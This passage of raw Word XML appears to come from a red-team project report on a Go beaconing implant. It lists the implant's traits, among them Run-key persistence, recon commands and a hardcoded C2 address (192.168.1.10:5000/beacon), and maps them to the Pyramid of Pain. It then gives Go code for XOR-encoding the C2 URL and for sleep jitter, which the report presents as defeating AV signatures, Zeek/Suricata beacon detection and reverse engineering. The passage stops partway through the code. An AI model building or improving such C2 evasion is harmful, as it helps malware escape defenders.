              <w:t>Firewall egress rules</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659F4" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Outbound traffic on port 5000 — blocked by default in most enterprise environments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1535B838" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="48E905EC" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="2E9516D0" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc226583760"/>
      <w:r>
        <w:t>5.3  Pyramid of Pain — What the Current Payload Bypasses</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="2898E881" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The Pyramid of Pain (David J. Bianco, 2013) describes how difficult it is for an attacker to change each type of indicator once a defender detects it. The table below maps each tier to the current payload's status.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1C6685"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2C0DF0" w14:paraId="411DEBF3"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95C500" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tier</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B34BD2" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Example in This Project</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708151" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Bypassed?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="334B67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195DB" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>TTPs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EBE76" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Beaconing every 60s, Run key persistence, netstat/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>tasklist</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> sequence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D8EC9" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No — obfuscation phase does not change core behaviour</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="254521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C6A3E0" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Tools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9BD56" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>The compiled .exe binary itself</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17AEA" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Partial — stripping + garble (Phase 04) makes signature harder</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="48618A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D31F7" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Network Artifacts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2BA61" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>X-Host header, port 5000, POST /beacon URL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4F96C" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No — Phase 04 addresses with header randomisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="4B30B1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8BB3C" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Host Artifacts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03D0C1" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C:\temp\recon_combined.txt, "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ReconBeacon</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>" Run key name</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6C3B6D" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No — static filenames remain; Phase 04 randomises key name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="0B3633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6C029" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>IP Addresses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6A196" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>192.168.1.10:5000 hardcoded in binary</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1D647" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Trivial — change C2 IP and recompile</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="1B3943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2D644" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Hash Values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2D189" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SHA-256 of the .exe</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D3EA6" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Yes — any recompile changes the hash entirely</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7EEE56A5" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="187EE976" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="57CF0E89" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc226583761"/>
      <w:r>
        <w:t>6. Obfuscation Phase</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="3D6D803A" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CDCFE79" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="351B33C9" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 04 applies three obfuscation techniques to the v3 payload. Each addresses a specific detection vector identified in the blue team analysis. All three techniques are fully implemented and tested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9E78F6"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00"/>
        <w:gridCol w:w="1526"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C0DF0" w14:paraId="0A6BA325"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93787E" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Technique</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824ED2" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Detection Vector Addressed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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1687FC" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="28DDB8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E78B0" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>XOR string encoding (T1027.002)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8E541" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Removes plaintext C2 URL, registry path, and command strings from binary — defeats strings.exe and static AV signatures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FEF57" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="2FD75C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34134" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sleep jitter (T1497)</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95F1A" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Replaces fixed 60s sleep with a random window (±20%) — defeats Zeek/Suricata beacon timing detection</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F241E8" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="4D3BF0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16BCF" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Binary stripping (-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ldflags</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>="-s -w")</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1DDE2" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Removes debug symbols and DWARF tables — defeats </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Ghidra</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> function name recovery, reduces binary size by ~33%</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A0057" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F7CE7F9" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="45DC06AF" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="24F94F80" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc226583762"/>
      <w:r>
        <w:t>6.1  XOR String Encoding — Implementation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0DF0" w14:paraId="3E9FEE8C" w14:textId="77777777">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0B6BB8DF" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>XOR String Encoding</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="56EDBC22"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80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="188F38CB" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>const</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xorKey</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> byte = 0x5A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4982859C" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2F4C7E8D" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>func</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xorStr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(s string) string {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="249FA8A3" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    b := []byte(s)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C153EA6" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    for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 range b { b[</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xorKey</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76111A14" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    return string(b)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09225ED1" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="069C1A9F" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2DB5FD0F" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>// Encode at build time, decode at runtime</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39BA043D" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">var </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>encodedURL</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xorStr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>("http://192.168.1.10:5000/beacon")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30415F32" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">c2URL := </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>xorStr</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encodedURL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>)   // decodes back at runtime</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="79573C50" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="22B1D2B5" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="1AED3728" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc226583763"/>
      <w:r>
        <w:t>6.2  Sleep Jitter — Implementation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0DF0" w14:paraId="09C52D5F" w14:textId="77777777">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969C55D" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Sleep Jitter Implementation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="3D19E251"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80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6C6A4BE8" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>func</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jitteredSleep</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">(base </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>time.Duration</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>, pct int) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44EEFE8A" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    delta  := int64(base) * int64(pct) / 100</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FA7C655" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    jitter := rand.Int63n(delta*2) - delta</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02706853" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="3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time.Sleep</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">(base + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>time.Duration</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(jitter))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D5EE988" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
